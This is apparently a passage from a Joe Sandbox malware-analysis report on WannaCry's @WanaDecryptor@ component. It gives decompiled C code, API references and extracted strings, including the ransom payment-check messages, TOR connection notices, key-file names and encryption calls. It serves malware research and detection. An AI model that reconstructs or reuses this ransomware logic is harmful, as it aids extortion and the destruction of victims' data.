						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}








































































                                                      0x004086e0
                                                      0x004086e0
                                                      0x004086e0
                                                      0x004086e2
                                                      0x004086ed
                                                      0x004086ee
                                                      0x004086fd
                                                      0x00408700
                                                      0x00408708
                                                      0x00408718
                                                      0x0040871f
                                                      0x00408736
                                                      0x00408742
                                                      0x00408743
                                                      0x00408746
                                                      0x0040874f
                                                      0x00408758
                                                      0x00408760
                                                      0x00408765
                                                      0x0040876d
                                                      0x0040877d
                                                      0x00408789
                                                      0x00408791
                                                      0x00408795
                                                      0x00408799
                                                      0x0040879d
                                                      0x004087a1
                                                      0x0040883f
                                                      0x0040884a
                                                      0x0040884e
                                                      0x004087a7
                                                      0x004087ba
                                                      0x004087cd
                                                      0x004087d8
                                                      0x004087dd
                                                      0x00408804
                                                      0x00408809
                                                      0x0040881f
                                                      0x00408823
                                                      0x0040882b
                                                      0x0040882c
                                                      0x00408831
                                                      0x00408831
                                                      0x00408856
                                                      0x0040885e
                                                      0x00408862
                                                      0x00408865
                                                      0x00408867
                                                      0x0040888c
                                                      0x0040888d
                                                      0x00408892
                                                      0x00408869
                                                      0x00408869
                                                      0x0040886f
                                                      0x0040886b
                                                      0x0040886b
                                                      0x0040886b
                                                      0x0040887d
                                                      0x0040887d
                                                      0x0040889e
                                                      0x0040889f
                                                      0x004088a4
                                                      0x004088ae
                                                      0x00408a7d
                                                      0x00408a85
                                                      0x00408a8f
                                                      0x00408ae5
                                                      0x00408ae9
                                                      0x00408a91
                                                      0x00408a91
                                                      0x00408ab9
                                                      0x00408abe
                                                      0x00408ac4
                                                      0x00408ad8
                                                      0x00408add
                                                      0x00408ade
                                                      0x00408ac6
                                                      0x00408ac8
                                                      0x00408acd
                                                      0x00408ace
                                                      0x00408ace
                                                      0x00408ac4
                                                      0x00408aed
                                                      0x004088be
                                                      0x004088c0
                                                      0x004088c9
                                                      0x004088d0
                                                      0x004088dd
                                                      0x004088e4
                                                      0x004088e8
                                                      0x004088ec
                                                      0x004088f0
                                                      0x004088f4
                                                      0x004088f8
                                                      0x004088ff
                                                      0x0040891e
                                                      0x00408901
                                                      0x0040890b
                                                      0x0040890b
                                                      0x0040892d
                                                      0x00408934
                                                      0x00408935
                                                      0x0040893b
                                                      0x0040893d
                                                      0x00408941
                                                      0x00408945
                                                      0x00408949
                                                      0x0040894f
                                                      0x00408951
                                                      0x00408958
                                                      0x0040895c
                                                      0x0040897e
                                                      0x00408980
                                                      0x0040895e
                                                      0x00408963
                                                      0x00408967
                                                      0x0040896d
                                                      0x0040896f
                                                      0x00408974
                                                      0x00408976
                                                      0x00408978
                                                      0x00408978
                                                      0x00408982
                                                      0x00408988
                                                      0x004089d3
                                                      0x004089d7
                                                      0x004089d9
                                                      0x004089d9
                                                      0x004089ec
                                                      0x0040898a
                                                      0x0040899e
                                                      0x004089a5
                                                      0x004089c2
                                                      0x004089a7
                                                      0x004089b0
                                                      0x004089b0
                                                      0x004089a5
                                                      0x00408a05
                                                      0x00408a0b
                                                      0x00408a17
                                                      0x00408a21
                                                      0x00408a6b
                                                      0x00408a6f
                                                      0x00408a73
                                                      0x00408a23
                                                      0x00408a23
                                                      0x00408a4b
                                                      0x00408a54
                                                      0x00408a59
                                                      0x00408a5e
                                                      0x00408a5e
                                                      0x00408a21
                                                      0x00408af5
                                                      0x00408af9
                                                      0x00408b02
                                                      0x00408b09
                                                      0x00408b15
                                                      0x00408b20
                                                      0x00408b2f
                                                      0x00408b3c

                                                      APIs
                                                      • #470.MFC42 ref: 00408708
                                                      • GetClientRect.USER32(?,?), ref: 0040871F
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                                      • #6734.MFC42(?,?), ref: 00408746
                                                      • #323.MFC42(?,?), ref: 0040874F
                                                      • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                                      • #1640.MFC42(00000000), ref: 004087DD
                                                        • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                                        • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                                      • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                                      • FillRect.USER32(?,?,?), ref: 0040887D
                                                      • #2754.MFC42(?,?), ref: 00408892
                                                      • #2381.MFC42(?,?,?), ref: 0040889F
                                                      • #3797.MFC42(?,?,?), ref: 004088C0
                                                      • _ftol.MSVCRT ref: 00408951
                                                      • _ftol.MSVCRT ref: 0040896F
                                                      • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                                      • #640.MFC42(?,?,?), ref: 00408B09
                                                      • #755.MFC42(?,?,?), ref: 00408B20
                                                        • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                                      • String ID: \gA$fA$fA
                                                      • API String ID: 1027735583-2217880857
                                                      • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                                      • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                      • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                      • API String ID: 2817753184-2613825984
                                                      • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                                      • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140filesynchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0);
					CloseHandle( *(_t94 + 0xac));
				}
				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
							L14:
							L00412CC8();
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}





























                                                      0x00401766
                                                      0x00401768
                                                      0x0040176d
                                                      0x0040176e
                                                      0x00401775
                                                      0x0040177e
                                                      0x00401780
                                                      0x00401785
                                                      0x0040178f
                                                      0x00401797
                                                      0x004017a5
                                                      0x004017b2
                                                      0x004017b2
                                                      0x004017b8
                                                      0x004017c3
                                                      0x0040193e
                                                      0x00401948
                                                      0x00401955
                                                      0x004017c9
                                                      0x004017c9
                                                      0x004017d2
                                                      0x004018f9
                                                      0x0040192f
                                                      0x00000000
                                                      0x00000000
                                                      0x00401931
                                                      0x00401932
                                                      0x00401934
                                                      0x00401939
                                                      0x00401939
                                                      0x00000000
                                                      0x00401939
                                                      0x00401901
                                                      0x0040191f
                                                      0x0040191f
                                                      0x00401920
                                                      0x00401925
                                                      0x00000000
                                                      0x00401925
                                                      0x00401903
                                                      0x00401909
                                                      0x0040190f
                                                      0x00401913
                                                      0x00000000
                                                      0x00000000
                                                      0x00401915
                                                      0x00401916
                                                      0x00401918
                                                      0x00000000
                                                      0x00401918
                                                      0x004017e3
                                                      0x004017e7
                                                      0x004017e9
                                                      0x004017eb
                                                      0x004017fa
                                                      0x00401801
                                                      0x00401803
                                                      0x00401810
                                                      0x00401811
                                                      0x00401821
                                                      0x00401827
                                                      0x00401829
                                                      0x0040182e
                                                      0x004018da
                                                      0x004018db
                                                      0x004018e0
                                                      0x004018e5
                                                      0x004018ea
                                                      0x00401834
                                                      0x00401844
                                                      0x0040184d
                                                      0x0040185b
                                                      0x00401863
                                                      0x00401870
                                                      0x00401873
                                                      0x00401877
                                                      0x0040187f
                                                      0x0040187f
                                                      0x00401885
                                                      0x00401892
                                                      0x00401893
                                                      0x00401894
                                                      0x00401895
                                                      0x0040189c
                                                      0x004018a1
                                                      0x004018a3
                                                      0x004018a4
                                                      0x004018a6
                                                      0x004018a7
                                                      0x004018af
                                                      0x004018b8
                                                      0x004018bf
                                                      0x004018c8
                                                      0x004018d3
                                                      0x004018d3
                                                      0x00000000
                                                      0x0040182e

                                                      APIs
                                                      • #6453.MFC42 ref: 00401780
                                                      • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                                      • CloseHandle.KERNEL32(?), ref: 004017B2
                                                      • sprintf.MSVCRT ref: 00401811
                                                      • fopen.MSVCRT ref: 00401821
                                                      • fread.MSVCRT ref: 00401844
                                                      • fclose.MSVCRT ref: 0040184D
                                                      • DeleteFileA.KERNEL32(?), ref: 0040185B
                                                      • #537.MFC42(You have a new message:), ref: 00401885
                                                      • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                                      • #1200.MFC42 ref: 004018AF
                                                      • #800.MFC42 ref: 004018BF
                                                      • #800.MFC42 ref: 004018D3
                                                      • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                                      Strings
                                                      • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                                      • %08X.dky, xrefs: 0040180A
                                                      • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                                      • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                                      • You have a new message:, xrefs: 00401877
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                                      • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                                      • API String ID: 2207195628-1375496427
                                                      • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                                      • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004012E0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E004012E0(void* __ecx) {
				int _v4;
				intOrPtr _v12;
				void _v2059;
				void _v2060;
				void _v2192;
				void _v2196;
				intOrPtr _v2324;
				void _v2328;
				void _v2332;
				char _v2364;
				char _v2396;
				char _v2436;
				char _v2468;
				char _v2508;
				char _v2540;
				intOrPtr _t61;
				long _t65;
				struct _IO_FILE* _t83;
				int _t85;
				intOrPtr _t88;
				struct _IO_FILE* _t91;
				int _t97;
				void* _t100;
				char* _t123;
				void _t131;
				struct _IO_FILE* _t143;
				struct _IO_FILE* _t146;
				struct _IO_FILE* _t149;
				void* _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t161;
				void* _t164;
				void* _t166;
				void* _t169;
				void* _t172;

				_push(0xffffffff);
				_push(E004134A6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t161;
				_t61 =  *0x42189c; // 0x0
				_push(_t156);
				_t154 = __ecx;
				_t3 = _t61 + 0x50c; // 0x50c
				_t100 = _t3;
				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
				_t164 = _t161 - 0x9e0 + 0x18;
				_t65 = GetFileAttributesA( &_v2540);
				_t157 = _t156 | 0xffffffff;
				if(_t65 == _t157) {
					L4:
					_v2196 = 0;
					memset( &_v2192, 0, 0x21 << 2);
					_t143 = fopen("00000000.res", "rb");
					_t166 = _t164 + 0x14;
					__eflags = _t143;
					if(_t143 != 0) {
						fread( &_v2196, 0x88, 1, _t143);
						fclose(_t143);
						_v2332 = 0;
						memset( &_v2328, 0, 0x21 << 2);
						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
						_t146 = fopen( &_v2364, "rb");
						_t169 = _t166 + 0x34;
						__eflags = _t146;
						if(_t146 != 0) {
							fread( &_v2332, 0x88, 1, _t146);
							fclose(_t146);
							_t131 =  *0x421798; // 0x0
							_v2060 = _t131;
							memset( &_v2059, 0, 0x1ff << 2);
							asm("stosw");
							asm("stosb");
							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
							_t83 = fopen( &_v2396, "rb");
							_t149 = _t83;
							_t172 = _t169 + 0x34;
							__eflags = _t149;
							if(_t149 != 0) {
								_t85 = fread( &_v2060, 1, 0x800, _t149);
								fclose(_t149);
								_t39 = _t100 + 0x242; // 0x74e
								_t40 = _t100 + 0x1de; // 0x6ea
								E0040BE90("s.wnry", _t40, _t39);
								_t88 =  *0x42189c; // 0x0
								_push( *((intOrPtr*)(_t154 + 0x20)));
								_push( &_v2540);
								_push( *((intOrPtr*)(_t88 + 0x818)));
								_push( *((intOrPtr*)(_t88 + 0x81c)));
								_t46 = _t100 + 0xb2; // 0x5be
								_push(_t85);
								_push( &_v2060);
								_push(_v2324);
								_push( &_v2332);
								_push( &_v2196);
								_push(_t100 + 0xe4);
								_t91 = E0040C240( &_v2332, __eflags);
								_t172 = _t172 + 0x4c;
								_t83 = E0040C670();
								__eflags = _t91;
								if(_t91 >= 0) {
									E00404640( &_v2436);
									_v4 = 1;
									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
									__eflags = _t94;
									if(_t94 == 0) {
										 *(_t154 + 0xa8) = 1;
									} else {
										 *(_t154 + 0xa8) = 2;
									}
									_v4 = 0xffffffff;
									_t123 =  &_v2436;
									goto L15;
								}
							} else {
								 *(_t154 + 0xa8) = 0xffffffff;
							}
						} else {
							 *(_t154 + 0xa8) = 0xffffffff;
						}
					} else {
						 *(_t154 + 0xa8) = _t157;
					}
				} else {
					E00404640( &_v2508);
					_v4 = 0;
					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
						_t97 = DeleteFileA( &_v2540);
						_v4 = _t157;
						E00404690(_t97,  &_v2508);
						goto L4;
					} else {
						 *(_t154 + 0xa8) = 2;
						_v4 = _t157;
						_t123 =  &_v2508;
						L15:
						_t83 = E00404690(_t94, _t123);
					}
				}
				 *[fs:0x0] = _v12;
				return _t83;
			}







































                                                      0x004012e6
                                                      0x004012e8
                                                      0x004012ed
                                                      0x004012ee
                                                      0x004012fb
                                                      0x00401305
                                                      0x00401307
                                                      0x00401316
                                                      0x00401316
                                                      0x00401323
                                                      0x00401339
                                                      0x0040133b
                                                      0x00401343
                                                      0x00401349
                                                      0x0040134e
                                                      0x004013b0
                                                      0x004013be
                                                      0x004013d3
                                                      0x004013db
                                                      0x004013dd
                                                      0x004013e0
                                                      0x004013e2
                                                      0x00401405
                                                      0x00401408
                                                      0x0040141c
                                                      0x00401427
                                                      0x00401440
                                                      0x00401459
                                                      0x0040145b
                                                      0x0040145e
                                                      0x00401460
                                                      0x00401481
                                                      0x00401484
                                                      0x0040148a
                                                      0x0040149e
                                                      0x004014a8
                                                      0x004014aa
                                                      0x004014ac
                                                      0x004014c1
                                                      0x004014d4
                                                      0x004014da
                                                      0x004014dc
                                                      0x004014df
                                                      0x004014e1
                                                      0x00401502
                                                      0x00401507
                                                      0x0040150d
                                                      0x00401513
                                                      0x00401520
                                                      0x00401525
                                                      0x0040152d
                                                      0x0040153e
                                                      0x0040153f
                                                      0x00401547
                                                      0x00401548
                                                      0x00401556
                                                      0x00401557
                                                      0x0040155f
                                                      0x00401567
                                                      0x0040156e
                                                      0x0040156f
                                                      0x00401570
                                                      0x00401575
                                                      0x0040157a
                                                      0x0040157f
                                                      0x00401581
                                                      0x00401587
                                                      0x004015a2
                                                      0x004015a9
                                                      0x004015ae
                                                      0x004015b0
                                                      0x004015be
                                                      0x004015b2
                                                      0x004015b2
                                                      0x004015b2
                                                      0x004015c4
                                                      0x004015cf
                                                      0x00000000
                                                      0x004015cf
                                                      0x004014e3
                                                      0x004014e3
                                                      0x004014e3
                                                      0x00401462
                                                      0x00401462
                                                      0x00401462
                                                      0x004013e4
                                                      0x004013e4
                                                      0x004013e4
                                                      0x00401350
                                                      0x00401354
                                                      0x00401367
                                                      0x00401379
                                                      0x0040139a
                                                      0x004013a4
                                                      0x004013ab
                                                      0x00000000
                                                      0x0040137b
                                                      0x0040137b
                                                      0x00401385
                                                      0x0040138c
                                                      0x004015d3
                                                      0x004015d3
                                                      0x004015d3
                                                      0x00401379
                                                      0x004015e3
                                                      0x004015f0

                                                      APIs
                                                      • sprintf.MSVCRT ref: 00401323
                                                      • sprintf.MSVCRT ref: 00401339
                                                      • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                                      • DeleteFileA.KERNEL32(?), ref: 0040139A
                                                      • fread.MSVCRT ref: 00401405
                                                      • fclose.MSVCRT ref: 00401408
                                                      • sprintf.MSVCRT ref: 00401440
                                                      • fopen.MSVCRT ref: 00401453
                                                        • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                                      • fopen.MSVCRT ref: 004013D5
                                                        • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                                        • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                        • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                                      • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                                      • API String ID: 2787528210-4016014174
                                                      • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                                      • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004076A0 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E004076A0(void* __ecx) {
				intOrPtr _t89;
				char _t90;
				intOrPtr _t91;
				signed int _t94;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t125;
				signed int _t133;
				void* _t136;
